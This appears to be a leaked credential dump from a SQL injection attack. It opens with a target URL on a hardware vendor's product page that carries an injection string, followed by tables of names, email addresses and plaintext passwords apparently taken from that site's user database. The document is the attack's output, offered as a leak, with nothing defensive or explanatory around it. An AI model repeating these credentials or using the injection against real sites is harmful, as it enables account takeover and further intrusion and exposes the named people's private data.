
Target : http://www.thecus.com/product.php?PROD_ID=76' and 76 and '1'='1

LOGIN_NAME        PASSWORD

twy@ms14.url.com.tw	12345678


USER_NAME   USER_EMAIL             USER_PASSWORD

James Tseng	1twy@ms14.url.com.tw	WelehWeleh1
vivian	vivian_wen@thecus.com	xu4wl6g81234
derickli	derick_li@thecus.com	*C1926D5D997DA514EC8
Peter sun	peter_sun@thecus.com	kiriko1028
Webmaster	webmaster@thecus.com	retsambew
Bruce Chien	bruce_chien@thecus.com	neihc_ecurB
Thomas Hsu	thomas_hsu@thecus.com	akuma66^
Cheryl	cheryl_tsai@thecus.com	Thecus1234
System	maggie_wang@thecus.com	maggie_wang@thecus.c
will_chen@thecus.com	will_chen@thecus.com	will1234
apple	apple_chen@thecus.com	apple0531
John	john_tsai@thecus.com	iastnhoj1@
abby	abbby_pan@thecus.com	750623
